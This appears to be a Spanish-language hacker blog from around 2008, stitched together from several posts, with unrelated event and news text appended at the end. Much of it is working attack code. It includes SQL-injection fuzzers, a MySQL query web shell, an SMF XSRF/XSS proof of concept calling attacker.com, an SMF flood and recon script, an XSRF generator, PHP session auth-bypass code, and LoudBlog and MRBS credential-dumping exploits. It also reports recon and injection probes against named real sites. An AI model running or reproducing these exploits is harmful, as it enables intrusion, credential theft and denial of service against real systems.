Blog de Xianur0

me da la vagancia de pasarlo a html y publicarlo aqui, asi que les dejo el link al foro donde publique el paper...

http://foro.infiernohacker.com/index.php/topic,9186.msg52246/topicseen.html

pues estuve revisando mis correos cuando vi un mail de uno de los lectores del blog, y pues me comento de este proyecto, que sinceramente me paresio muy interesante:

El 11 de diciembre de 2008 12:27, José Ramón Palanco escribió:
Buenas,

que tal, llevo unas semanas siguiendo tu blog y es muy entretenido.
Me gustaría hablarte de un proyecto software libre en el que estamos
desarrollando, se llama w3af y es un framework de test de intrusion
web en python. Si no lo conoces estoy seguro de que te gustará. Por
otro lado si quieres hacer cualquier aportación, solo tienes que
enviarlo a la lista.

Web del proyecto: http://w3af.sf.net

les recomiendo leer la web del proyecto, es realmente muy bueno, aunque se le podrían agregar algunas cosas.

Felicidades a los miembros de ese proyecto :)..

Backdoors En Sesiones PHP By Xianur0

Simple, esto consiste en una mezcla de XSRF y Un mini Bug en las sessiones PHP
Que necesitamos?, simplemente que la web utilice sessiones y un clic del admin.

Vamos por un inicio, envenenar un sistema, solo se necesita de:

session_start();

GET /vuln.php HTTP/1.1
Host: victima.com
Cookie: PHPSESSID=xianur0

$_SESSION['is_admin']="true";
?>

Esta lista la iré llenando, pero por ahora pondré un vídeo (con sus respectivas herramientas que use de ejemplo).

No es tanto como rootear pero si se puede subir shell jeje..

Xianur0 ~ # perl fuzzer.pl http://localhost/vuln.php?id=
Imprime Columna: 0
Imprime Columna: 1
Imprime Columna: 2
URI Generado:
http://localhost/vuln.php?id=-10/**/UNION/**/SELECT/**/concat(0x46757a7a657242795869616e757230,0),concat(0x46757a7a657242795869616e757230,1),concat(0x46757a7a657242795869616e757230,2)


(utilizamos el mismo script que en el ultimo manual de SQL Injection que publique)

Fuzzer.pl:

#!/usr/bin/perl
#By Xianur0
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
my $uri = $ARGV[0];
$uri = shift || die("Uso: fuzzer.pl [URI a SQL Injection]\n");
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16");
my $inyeccion = "-10/**/UNION/**/SELECT/**/concat(0x46757a7a657242795869616e757230,0)";
$uri .= "$inyeccion";
for($i=1; $i<1000;$i++) {
$uri .= ",concat(0x46757a7a657242795869616e757230,$i)";
$req = HTTP::Request->new(GET => $uri);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if($res->content !~ "The used SELECT statements have a different number of columns") {
for($o=0; $o<=$i;$o++) {
if($res->content =~ "FuzzerByXianur0$o") {
print "Imprime Columna: $o\n";
}
} die "URI Generado: \n$uri\n";}}

<html>
<body>
<?php
function conectado()
{
print '<h1>Conectado!</h1><form action="" method="POST">
<textarea rows="10" cols="40" name="comando"></textarea><br>
<input type="submit" value="xEcut!">
</form>';
}

function inicio() {
print '<form action="" method="GET">
<b>Server: <input type="text" name=server><br>
User: <input type="text" name=user><br>
Password: <input type="text" name=passwd><br>
DB: <input type="text" name=db><br>
<input type="submit" value="Conectar">
</form>';
}

$link = mysql_connect($_GET['server'], $_GET['user'], $_GET['passwd']);
$conectado = mysql_select_db($_GET['db'], $link);
if($conectado) conectado();
if(isset($_POST['comando'])) {
$result = mysql_query($_POST['comando'], $link);
while ($row = mysql_fetch_row($result)){
echo '<textarea rows="10" cols="40">';
foreach($row as $indice => $valor) print $valor."\n";
print '</textarea><br>';
}
} else inicio();
?>
</body>
</html>

<?php
print "<title>Purificador de Caracteres By Xianur0</title><h1>Purificador de Caracteres By Xianur0</h1><form method='POST'><textarea rows='10' cols='30' name='code'></textarea><br><input type='submit' value='Limpiar!'></form>";
function ascii2hex($ascii) {
for ($i = 0; $i < strlen($ascii); $i++) {
$byte = ord($ascii{$i});
if($byte >=21 && $byte <=126) {
$hex .= chr($byte);
}}
return $hex;
}

if(isset($_POST['code'])) print "<br><b>Texto Limpiado: <br></b>".htmlentities(ascii2hex($_POST['code']));
?>

lo posteo tal cual lo envie a milw0rm :)..

0days jejje

Author: Xianur0
Affected Versions: All
Vendors: Simple Machine Forums
Vendors Webpage: http://www.simplemachines.org/

XSRF PoC (http://attacker.com/packages.xml):

<?xml version="1.0"?>
<!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">
<!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
XSRF PoC By Xianur0
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -->

<package-list xmlns="http://www.simplemachines.org/xml/package-list" xmlns:smf="http://www.simplemachines.org/">
<list-title>Xianur0 Was Here</list-title>

<section>
    <title>SMF XSS PoC By Xianur0</title>
    <text><![CDATA[<script>alert('XSS')</script>]]></text>
    <modification>
        <id>Xianur0:XSMF</id>
        <name>SMF PoC By Xianur0</name>
        <filename>smfexploit.zip</filename>
        <version>0.1</version>
        <author email="uxmal666@gmail.com">Xianur0</author>
        <description><![CDATA[<script>alert(document.cookie)</script>]]></description>
    </modification>
</section>
</package-list>

<iframe src ="http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com" width="0%" scrolling=no width=0%></iframe>

if (!isset($_GET['page']) || !isset($context['all_pages'][$
_GET['page']]))
$_GET['page'] = 'index';

if (!is_array($_GET['page']) && !isset($_GET['page']) || !is_array($_GET['page']) &&  !isset($context['all_pages'][$_GET['page']]))
$_GET['page'] = 'index';

#!/usr/bin/perl

use LWP::UserAgent;
use Getopt::Std;


my $url = $ARGV[1] || die ("Use: smf.pl [Full URL] [option]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l Installed Mods List \n-b Find Temporary\n");


$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');

    getopts('fplb', \%opt);
    flood() if $opt{f};
    path() if $opt{p};
    list() if $opt{l};
    temp() if $opt{b};

sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}

sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
 my $html = $res->content;
 my @htmls = split('Undefined variable: ssi_layers in <b>', $html);
 my @htmls = split('SSI.php</b>', $htmls[1]);
if($htmls[0] ne "") { print "Directory: $htmls[0]\n"; } else { print "Getting error Directory!\n";}
}
}

sub flood {
print "Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET => $url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "Sent: ".$i."\n";
} else {
print "HTTP Error Query: " . $res->status_line . "\n";
}
}
}


sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "Temporary File Found: ".$url."/".$temp."\n";
}
}
}

sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
 my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "Description: $mod[0]\nFile: $url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";

}
}
}

Puertos abiertos:

PORT STATE SERVICE
23/tcp open telnet
25/tcp filtered smtp
53/tcp open domain
80/tcp open http
514/tcp open shell
554/tcp open rtsp
646/tcp filtered unknown
1755/tcp open wms
3128/tcp open squid-http

HTTP Proxy Transparent: www.carlosslim.com:3128
Telnet: www.carlosslim.com:23
Bash History: http://ns6.carlosslim.com/.bash_history


Analizando los DNS:

Xianur0 ~ # dig @ns6.carlosslim.com carlosslim.com ANY ; <<>> DiG 9.4.1 <<>> @ns6.carlosslim.com carlosslim.com ANY ; (1 server found) ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36506 ;; flags: qr aa rd; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 3 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;carlosslim.com. IN ANY ;; ANSWER SECTION: carlosslim.com. 86400 IN A 200.65.129.1 carlosslim.com. 86400 IN A 200.65.0.26 carlosslim.com. 86400 IN SOA ns6.carlosslim.com. dominios.telmex.com. 84 28800 7200 604800 600 carlosslim.com. 86400 IN MX 10 smtp.carlosslim.com. carlosslim.com. 86400 IN NS ns6.carlosslim.com. carlosslim.com. 86400 IN NS ns7.carlosslim.com. ;; ADDITIONAL SECTION: smtp.carlosslim.com. 86400 IN A 200.57.144.18 ns6.carlosslim.com. 86400 IN A 200.57.141.232 ns7.carlosslim.com. 86400 IN A 200.57.141.233 ;; Query time: 73 msec ;; SERVER: 200.57.141.232#53(200.57.141.232) ;; WHEN: Wed Nov 5 16:51:14 2008 ;; MSG SIZE rcvd: 221


Xianur0 ~ # nc -vv ns6.carlosslim.com 80
DNS fwd/rev mismatch: ns6.carlosslim.com != cust-200-57-141-232.triara.com
ns6.carlosslim.com [200.57.141.232] 80 (http) open
OPTIONS / HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Wed, 05 Nov 2008 23:59:31 GMT
Content-length: 0
Content-type: magnus-internal/directory
Allow: HEAD, GET

sent 36, rcvd 167

Xianur0 ~ # nc -vv ns7.carlosslim.com 80
DNS fwd/rev mismatch: ns7.carlosslim.com != cust-200-57-141-233.triara.com
ns7.carlosslim.com [200.57.141.233] 80 (http) open
TRACE / HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Thu, 06 Nov 2008 00:04:44 GMT
Content-length: 37
Content-type: message/http

TRACE / HTTP/1.1
Host: localhost

sent 34, rcvd 174

Xianur0 ~ # dig @ns6.carlosslim.com localhost SOA

; <<>> DiG 9.4.1 <<>> @ns6.carlosslim.com localhost SOA
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 16496 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;localhost. IN SOA ;; ANSWER SECTION: localhost. 86400 IN SOA tmpyap01.telmex.com. dominios.telmex.com. 1 28800 7200 604800 3600 ;; AUTHORITY SECTION: localhost. 86400 IN NS ns6.telmex.com. ;; ADDITIONAL SECTION: ns6.telmex.com. 600 IN A 200.57.141.232 ;; Query time: 685 msec ;; SERVER: 200.57.141.232#53(200.57.141.232) ;; WHEN: Wed Nov 5 17:12:21 2008 ;; MSG SIZE rcvd: 125

Hola gente, ya se que es un juego muy friki xD... pero me envicie con el jaja

Servidor: 15
Clan: H.C.
Nombre del Clan: Hijos de Cain

algún interesado?, la entrada es publica xD...

Victim: http://www.tinyportalmedia.com
Method: Unsafe handling packages
Used Tool: Tool For SMF Testing By Xianur0

Xianur0 cys # perl smf.pl
Use: smf.pl [option] [Full URL]
Options:
-f Flood
-p Search Directory Setup
-l Installed Mods List
-b Find Temporary

Xianur0 cys # perl smf.pl -p http://www.tinyportalmedia.com/main/
Directory: /home/strzxpz/public_html/main/

Xianur0 cys # perl smf.pl -b http://www.tinyportalmedia.com/main/
Temporary File Found: http://www.tinyportalmedia.com/main//index.php~
Temporary File Found: http://www.tinyportalmedia.com/main//Settings.php~
Temporary File Found: http://www.tinyportalmedia.com/main//Settings_bak.php~

mmm el hijo prodigio?

#!/usr/bin/perl

#By Xianur0
#uxmal666[at]gmail.com
  use HTML::Parser;
$i = 1;
$b = 1;
my $parser = HTML::Parser->new(api_version=>3,
start_h=>[\&parsear, 'tag, attr'] ,);
print "\n\n                                       Generador XSRF By Xianur0\n\n\n";

$file = $ARGV[0] || die("Use: xsrf.pl [File]\n");

open(FILE,$file) || die "No pudo abrirse: $!";
while(<FILE>) {
$html.= $_;
}
print "\nBuscando Campos....\n";
sub parsear {
     my ($tag, $attr) = @_;
if($tag =~ "form") {
$name = $attr->{"name"};
if($name eq "") { $name = "campo" }
$valor = $attr->{"action"};
$metodo = $attr->{"method"};
if($metodo eq "") { $metodo = "GET"}
print "\nFormulario ".$b.": ".$name."=>".$valor."=>".$metodo."\n";
    $form{$b} = [$name, $metodo];
$b++;
}
if($tag =~ "input") {
$name = $attr->{"name"};
$valor = $attr->{"value"};
print "Campo ".$i.": ".$name."=>".$valor."\n";
    $input{$i} = [$name, $valor];
$i++;
}
}
$parser->parse($html);
print "\nTerminado Archivo Parseado!..\n\n";
print "\nEscribe el Formulario a utilizar:\n";
$forma=<STDIN>;
chop($forma);
print "Cuantos Campos(input) utilizara?\n";
$cantidad=<STDIN>;
chop($cantidad);
for($o=1;$o<=$cantidad;$o++)
{
print "Formulario $o?\n";
$inputa=<STDIN>;
chop($inputa);
print "Desea Cambiar el Value? [y/n]\n";
$respuesta=<STDIN>;
chop($respuesta);
if($respuesta eq "y") { 
print "Escriba el Nuevo Valor:\n";
$valu=<STDIN>;
chop($valu);
} else { $valu = $input{$inputa}[1]; }
$campos .='<input type="hidden" name="'.$input{$inputa}[0].'" value="'.$valu.'">';
}
print "Url Submit?\n";
$url=<STDIN>;
chop($url);
print "Generando XSRF Espere Por Favor...\n";
$xsrf = '<html><body><!-- XSRF Generator By Xianur0 -->
<form name="'.$form{$forma}[0].'" action="'.$url.'" method="'.$form{$forma}[1].'">'.$campos.'</form>
<script>document.'.$form{$forma}[0].'.submit()</script></html></body>';
open(LECTURA,">> xsrf.htm") || die "No pudo abrirse: $!";
print LECTURA $xsrf;
close(LECTURA);
print "\n\nGenerado!: xsrf.html\n\n";

[Paper] Insecurity in PHP sessions By Xianur0

The sessions as its name says are user sessions (contain any information or ID of the user). The sessions being used on a shared server can be very serious security flaws, namely those sessions can be used for certain kinds of attacks, including a data mining (search for useful information) for example, if we go to the temporary directory used by PHP to store sessions (almost always is / tmp /) you can find sessions like this:

user|s:5:"admin";password|s:11:"mipassword";

where is the user name of the first session, 5 is the id and admin is the content, with the same password (second session).

Now we already have a username and a password.

Also, many developers overlook the possibility of Injection data sessions as the example below:

Vulnerable code (PHPNews 1.3):

if((isset($_POST['user']) && isset($_POST['password'])) || (isset($_SESSION['user']) && isset($_SESSION['password'])))
{
if(isset($_SESSION['user']) && isset($_SESSION['password']))
{
$in_user = $_SESSION['user'];
$in_password = $_SESSION['password'];
}
else if(isset($_POST['user']) && isset($_POST['password']))
{
if (!get_magic_quotes_gpc())
{
$in_user = addslashes($_POST['user']);
$in_password = addslashes($_POST['password']);
}
else
{
$in_user = $_POST['user'];
$in_password = $_POST['password'];
}
}

$result = mysql_query('SELECT * FROM ' . $db_prefix . 'posters WHERE username = \'' . $in_user . '\' AND password = password(\'' . $in_password . '\')');
$dbQueries++;
if(mysql_numrows($result) != 0)
{
$auth = true;
$_SESSION['user'] = $in_user;
$_SESSION['password'] = $in_password;
}
else
{
$bad_details = true;
}


Exploit Bypass through sessions:

<?php
session_start();
$_SESSION["user"] = "' OR '1'='1";
$_SESSION["password"] = "') OR ('1'='1";
print "Cookie Master: <br>\nPHPSESSID=".$_COOKIE['PHPSESSID']."<br>\n";
?>

the sessions are not filtered, therefore you can set up these sessions and Injection data, the exploit to schedule (above) only works if the php is using the same route of the sessions that PHPNews.

Although the safemode and this can not be bypassed directories, almost always used the same route on a temporary server for everything. So the sessions can be generated without regard to the security mechanisms that are used (enjoyable clear change the temporary directory to a free reading by another user on the same server and is completely filtering the sessions).

But can be read by the sessions that are held as temporary files and directories that time spent almost always reading for all users of that server.

You can also obtain the content of the sessions when you can not read the files directly:

<?php
@session_start();
foreach ($_SESSION as $name => $valor)
{
print "<b>Name:</b> $name\n<br><b>Value:</b> $valor\n<br><br>";
}
?>

PHP opens the temporary directory of sessions with the call to the global variable $_SESSION (that is not filtered in safemode), so we give the value of the sessions (the code that travels the HTTP is only a reference to the file session on the server) whatever the domain (you can specify the directory of sessions with the function session_save_path()).


I wrote a tool to automate this process:

http://xianur0.blogspot.com/2008/10/session-master-by-xianur0.html

This Exploit requires a valid user name and password of an account regardless of the permissions

Author: Xianur0
Affected: All Versions
Bug: SQL Injection

Doorks:
allintext: "powered by LoudBlog"

Exploit:

#!/usr/bin/perl

use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use Digest::MD5 qw(md5_hex);
$ua = LWP::UserAgent->new;

print "\n             LoudBlog Exploit All Version By Xianur0\n\n";
$uri = $ARGV[0];
$id = $ARGV[1];
$password = $ARGV[3] || die("\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n");
$md5 = md5_hex($ARGV[2]).":".md5_hex($password);

my $req = POST $uri.'/loudblog/ajax.php',
              [ colpick => "concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)", rowpick => "id", rowval => $id, table => 'authors', action => 'singleread'];
$req->header('User-Agent' => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17');
$req->header('Cookie' => 'lbauth='.$md5);
$res = $ua->request($req);
print $res->content."\n";

 //which row do we manipulate?
 $rowpick = "";
 if (isset($p['rowpick'])) $rowpick = $p['rowpick'];
 $rowval = "";
 if (isset($p['rowval'])) $rowval = $p['rowval'];
 
 
 //which column do we manipulate or read?
 $colpick = "";
 if (isset($p['colpick'])) $colpick = $p['colpick'];
 $colval = "";
 if (isset($p['colval'])) $colval = $p['colval'];
 if (isset($p['makehtml'])) $colval = makehtml($p['colval']);
 
 
 // do the request action!!
 
 if ($p['action'] == "singleread") {
  $dosql = "SELECT ".$colpick." FROM ". $table." WHERE ".$rowpick." = '".$rowval."'";
  $return = $GLOBALS['lbdata']->GetArray($dosql);
  echo $return[0][$colpick];

Reporte el bug al admin, y le prometí que no lo diría hasta haberlo corregido:

http://calendar.astro.princeton.edu/mrbs/

(metan en google la búsqueda: astro.princeton.edu/mrbs
y verán que CMs usaba jejeje)

Mensaje:

Good evening, my nickname is Xianur0, I write about and reported security flaws in its system, to begin a Blind SQL Injection (do not authorized to consult your SQL system (MySQL)) for example:

http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),1,1))=109
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),2,1))=114
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),3,1))=98
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),4,1))=115
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),5,1))=64
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),6,1))=108
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),7,1))=111
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),8,1))=99
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),9,1))=97
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),10,1))=108
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),11,1))=104
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),12,1))=111
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),13,1))=115
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),14,1))=116

By making a SQL incorrect table stays empty rooms or with a single element, to be correct these consultations, the table shows all the rooms.

Sorting the results in ASCII:
109,114,98,115,64,108,111,99,97,108,104,111,115,116

and translate them into a readable string, we get:
mrbs@localhost

Which is the user of MySQL used by the system, now we made another inquiry to identify which tables are permitted for that user in MySQL:
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1 AND (SELECT count (*) FROM INFORMATION_SCHEMA.TABLES)
There database: INFORMATION_SCHEMA and table: tables, this database contains information on the MySQL (for example: tables, columns, etc.), we now how many databases that are in mysql:

http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1 AND (SELECT count (TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES) = 20

This means that there are 20 databases recorded in the INFORMATION_SCHEMA, and if we keep the first step (to which we obtained the user can obtain the structure of the system, users obtain and carry out an attack on the system).


Profile: http://milw0rm.com/author/1657
Nick: Xianur0
Web: http://xianur0.blogspot.com
Email: uxmal666@gmail.com

Sorry For My Bad English

bueno el mensaje sirve como ejemplo de Blind SQL Injection manual xD...

jeje hasta los grandes tienen sus malos momentos...

"MRBS is a system for multi-site booking of meeting rooms. Rooms are grouped by building/area and shown in a side-by-side view. Although the goal was initially to book rooms, MRBS can also be used to book any resource (computer, planes, whatever you want)".

Web CMS: http://sourceforge.net/projects/mrbs/
Affected: Previous versions of mrbs 1.4
Solution: Update to Version 1.4

Doorks:
"Meeting Room Booking System" "month.php?area="
"Meeting Room Booking System" "day.php?area="
"Meeting Room Booking System" "week.php?area="

Author: Xianur0
Try: http://www.sitio.com/path/month.php?area=1/**/and/**/1=0

Exploit:

#!/usr/bin/perl

#Xianur0 CYS # perl blind.pl http://www.victima/st/schedule/ 'SELECT user()'
#
#Exploit MRBS By Xianur0
#
#Please Have Patience, The Blind SQL Injection is running.........
#pma@localhost
#
#
#Finished!
#


# By Xianur0

use LWP::UserAgent;

%ascii = ("32", " ","32", " ","33", "!","34", '"',"35", "#","36", '$',"37", "%","38", "&","39", "'","40", "(","41", ")","42", "*","43", "+","44", ",","45", "-","46", ".","47", "/","48", "0","49", "1","50", "2","51", "3","52", "4","53", "5","54", "6","55", "7","56", "8","57", "9","58", ":","59", ";","60", "<","61", "+","62", ">","63", "?","64", '@',"65","A","66","B","67","C","68","D","69","E","70","F","71","G","72","H","73","I","74","J","75","K","76","L","77","M","78","N","79","O","80","P","81","Q","82","R","83","S","84","T","85","U","86","V","87","W","88","X","89","Y","90","Z","95","_","97", "a", "98", "b", "99", "c", "100", ,"d","101","e", "102", "f", "103","g", "104", "h", "105","i", "106", "j", "107","k", "108", "l", "109","m", "110", "n", "111","o", "112", "p", "113","q", "114", "r", "115","s", "116", "t", "117","u", "118", "v", "119","w", "120", "x", "121","y", "122", "z");

$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$url = $ARGV[0];
$sql = $ARGV[1] || die("Use: blind.pl [Complete URL] [SQL Injection]\nExample: blind.pl http://www.victima.com/mrbs/ 'SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES'\n");
print "\nExploit MRBS By Xianur0 \n\nPlease Have Patience, The Blind SQL Injection is running.........\n";
$caracter = 1;
$i=0;
$detector = '<h1>No rooms defined for this area</h1>';
$simbolo = ">";
while($caracter ne "finito") {
$req = HTTP::Request->new(GET => $url.'/month.php?year=2008&month=08&area=1%20AND ascii(substring(('.$sql.'),'.$caracter.',1)) '.$simbolo.' '.$i);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if ($res->is_success) {
   if($res->content !~ $detector) {
if($base eq $i) { print "$ascii{$i}"; $caracter++; $i=0; $simbolo = ">";}
$base = $i;
$i = $i+10;
} else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";}
}
} else {
   print "\nError detected in HTTP requests: " . $res->status_line . "!\n";
}
}

print "\nFinished!\n";


http://milw0rm.com/exploits/6781

En la Semana Nacional de Ciencia y Tecnología (SNCT), niños y jóvenes conocen las múltiples posibilidades que ofrecen las áreas de la ciencia en los campos de la actividad productiva, la investigación científica y la docencia; su misión es promover la ciencia y proyectarla como pilar fundamental del desarrollo económico, cultural y social de nuestro país. Comparten este propósito las instituciones educativas, asociaciones científicas, secretarías de estado, empresas, centros de investigación, museos de ciencia y gobiernos estatales.

La SNCT se realizará del 20 al 24 de octubre en todo el territorio nacional y se concreta en eventos creativos y propositivos de científicos, maestros, divulgadores y empresarios mediante ciclos de conferencias, talleres, exposiciones, demostraciones, visitas guiadas, concursos y ferias científicas, entre otros.

En el estado de Veracruz coordinan la SNCT el Consejo Veracruzano de Ciencia y Tecnología (Covecyt), la Universidad Veracruzana (UV), el Instituto de Ecología (Inecol), las secretarías de Educación en Veracruz (SEV) y de Educación Pública (SEP), la oficina del Conacyt en el estado, los ayuntamientos de Xalapa, Banderilla y Coatepec, con el apoyo de las autoridades educativas estatales, entre otros.

Actividades en Xalapa

La inauguración será el lunes 20 de octubre a las 18:00 horas en el Palacio Municipal, con el mensaje de bienvenida del alcalde David Velasco Chedraui. Acto seguido, autoridades del Conacyt, Covecyt, UV, SEV, SEP y del Fondo de Cultura Económica (FCE) entregarán reconocimientos a alumnos destacados en eventos científicos nacionales.

Posteriormente, Zaira Domínguez Esquivel, investigadora de la Unidad de Servicios de Apoyo de Resolución Analítica de la UV, dará un mensaje a los asistentes. Se cierra el evento con un concierto de la Orquesta Municipal de Xalapa.

Al día siguiente se inauguran los Espacio de Ciencia y Tecnología en Xalapa, Banderilla y Coatepec.
En Xalapa el Espacio de Ciencia y Tecnología será el Centro Recreativo Xalapeño, del martes 21 al jueves 23 de octubre, en horario de 10:00 a 14:00 y de 17:00 a 20:00 horas, con las siguientes actividades:
El martes se hará la presentación de la convocatoria 2009 “Leamos la Ciencia para Todos” para estudiantes de secundaria, bachillerato y universidad. Durante todo el día habrá charlas de divulgación científica, así como los talleres “Juguemos con la ciencia” y “Manejo de residuos: integrando conocimiento y práctica para el cuidado ambiental”, dirigidos a docentes y padres de familia. Se podrá recorrer la exposición de prototipos tecnológicos de las diferentes instituciones de educación.

El miércoles se ofrecen charlas de divulgación científica impartidas por investigadores de la UV y el Inecol, con temas interesantes como “La basura, un problema o una oportunidad” o “Una aproximación al protométodo (o cómo hacer chilaquiles sin quemarlos)”, con los Camaradas de la Ciencia. Se organizan los talleres “Manejo de residuos: Integrando conocimiento y práctica para el cuidado ambiental” y “Una ruta hacia la lectura de la ciencia” y continúa la exposición de prototipos tecnológicos.

El jueves siguen charlas de divulgación científica como “Robótica Didáctica”; también los talleres “Lectura y creatividad”, “Las ciencias y el ámbito cotidiano” y “Separa, aprende, diviértete y salva al planeta”. La exposición de prototipos tecnológicos, “El Bingo de la Ciencia”, y la obra de teatro La ciencia no es como la pintan… de rojo. La versión del Lobo y la caperucita…roja.

Informes con Adalberto Fox al correo afox@uv.mxEsta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla , o al teléfono 817-40-57.

Periodismo científico

Martín Bonfil, de la Dirección de Divulgación Científica de la UNAM, ofrecerá del 20 al 22 de octubre, de 10:00 a 14:00 horas, el III Curso de Periodismo Científico, dirigido a los profesionales de los medios de comunicación del estado, en la sala de videoconferencias de la Dirección de Investigaciones de la UV en Xalapa, con transmisión a las salas de videoconferencias de Poza Rica, Coatzacoalcos, Boca del Río y Orizaba. Inscripciones gratuitas al correo covecyt@gmail.comEsta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla con Heriberto Contreras, o al teléfono 841-36-70.

Espacio de Ciencia y Tecnología en Banderilla

Las actividades serán en “La casa del abuelo” en el centro de Banderilla, del miércoles 22 al viernes 24 de octubre, de 9:00 a 12:00 horas, y se ofrecerán talleres científicos simultáneos como las Olimpiaguas;

¿Está claro?; Hidráulica colonial; Uniéndose; Ramificaciones y Visualizando el agua subterránea. También se hará la proyección de videos, una presentación de prototipos tecnológicos, así como talleres para docentes.

En esta sede se hará la clausura oficial de la SNCT el día viernes con la presentación de las convocatorias a los concursos infantil y juvenil “Imagina la ciencia y la tecnología”. Coordina Gloria Jiménez, al correo jimmoreg@hotmail.comEsta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

También en Coatepec

En el Palacio Municipal, el lunes 20 de octubre se llevará a cabo el programa de la SNCT, iniciando con un mensaje de Sergio Ramírez Cabañas, presidente municipal, después de la conferencia que ofrecerá Gerardo Mata Montes de Oca, secretario técnico del Inecol. A las 11:00 horas se presentará la obra de teatro Alpha: un pedacito de cielo, y posteriormente se hará un recorrido por la exposición de prototipos del CBTIS 165.

Habrá un concurso de dibujo infantil y la Carrera de la Semana de la Ciencia. Cerrando con música veracruzana con el grupo “Zarambeaque”. Coordina en Coatepec Guadalupe López gplopez@ecologia.edu.mxEsta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

Simultáneamente en todo Veracruz y el país, las diferentes instituciones educativas, ayuntamientos, empresas y dependencias gubernamentales organizan actividades similares que permitan fomentar entre la población el interés por la ciencia y la tecnología. La invitación es a participar y sumarse a esta labor que beneficia a nuestros niños y jóvenes.

YouTube, el sitio de difusión de videos por internet, rechazó una petición para revisar sus políticas y dejar de remover en forma expedita videos de campaña del republicano John McCain que pudieran infringir leyes de derecho de autor.

Los videos de campaña de McCain han sido removidos con frecuencia por YouTube, tras recibir quejas de que algunos infringen las leyes de derecho de autor al utilizar imágenes y audios de debates de televisión y discos protegidos, sin contar con los permisos para ello.

